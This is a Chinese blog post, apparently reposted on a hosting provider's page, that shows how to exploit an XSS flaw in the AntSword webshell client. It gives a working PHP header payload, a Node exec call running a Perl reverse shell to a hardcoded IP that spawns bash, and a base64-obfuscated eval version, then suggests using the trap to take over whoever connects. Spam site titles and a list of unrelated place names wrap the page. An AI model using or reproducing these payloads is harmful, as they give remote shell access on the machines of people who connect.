中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

蟻劍xss漏洞,獲取者shell

發布時間:2020-05-25 05:16:23 來源:網絡 閱讀:4809 作者:菜鵝小生 欄目:安全技術

今日在github上看到蟻劍暴露了一個xss漏洞,自己也經常使用蟻劍。同時在freebuf上也有一篇文章,關于蟻劍漏洞的。閑著沒事測試了一波。

一、漏洞成因

蟻劍shell遠程連接失敗時,蟻劍會返回錯誤信息,但因為使用的是html解析,導致xss漏洞。

用過蟻劍的童靴都清楚,當我們遠程連接寫好的webshell的時候,有時候可能因為shell書寫錯誤或者鏈接填寫不當的時候,會出現大堆的錯誤代碼。
蟻劍xss漏洞,獲取者shell

該信息并沒有進行 XSS 保護,因此能夠利用 js 調用 perl 便可反彈***者的shell

很多時候我們不去注意,但這里恰恰就是漏洞利用點。(漏洞往往就在你的眼皮地下,你只要向下看看就能找到。可惜我們只向前看,不向下看。)

二、漏洞驗證

鑒于本人對js沒有深入了解,只懂得些皮毛。這里就直接引用別人寫好的shell了

(1)驗證xss漏洞的存在

<?php header('HTTP/1.1 500 <img src=# onerror=alert(1)>');?>

蟻劍xss漏洞,獲取者shell

Head()函數,向客戶端發送原始的 HTTP 報頭。
當蟻劍遠程連接shell的時候就會觸發彈框。

(2)反彈***者shell

require('child_process').exec('perl -e \'use Socket;$i="192.168.80.151";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });

將這些代碼進行base64加密

cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxOTIuMTY4LjgwLjE1MSI7JHA9MTAwMjtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL2Jhc2ggLWkiKTt9O1wnJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7

構造header

<?php

header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxOTIuMTY4LjgwLjE1MSI7JHA9MTAwMjtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL2Jhc2ggLWkiKTt9O1wnJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7`,`base64`).toString())'>");
?>

將其寫入被***中的網站目錄下
蟻劍xss漏洞,獲取者shell

被***機監聽1002端口
蟻劍xss漏洞,獲取者shell

***機蟻劍遠程連接

蟻劍xss漏洞,獲取者shell

獲得***者shell
蟻劍xss漏洞,獲取者shell

在最新的版本中, 修改了 toastr 可以輸出 html 的特點,以后均不支持輸出 html。建議及時更新到最新版本

三、總結

如果你檢測到了自己被上傳了webshell,不妨可以試一試這個漏洞,對方如果使用的是蟻劍,當對方連接你的時候,也是他上線的時候。或者在比賽(zhen shi)環境的時候,故意制造一個這樣的shell,誘惑一些小可愛連一下。

參考鏈接:
https://github.com/AntSwordProject/antSword/issues/147

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

申扎县| 石家庄市| 东光县| 桐梓县| 渭南市| 兴隆县| 新巴尔虎左旗| 大理市| 西乡县| 乐至县| 龙陵县| 唐河县| 巴彦淖尔市| 无锡市| 精河县| 信宜市| 垣曲县| 资阳市| 巴林右旗| 宜都市| 榆林市| 乌兰浩特市| 韶关市| 新营市| 阿合奇县| 资溪县| 武平县| 渑池县| 江西省| 盐城市| 五常市| 化隆| 镇江市| 池州市| 突泉县| 宜兰市| 南岸区| 九江县| 吉木萨尔县| 芷江| 公安县|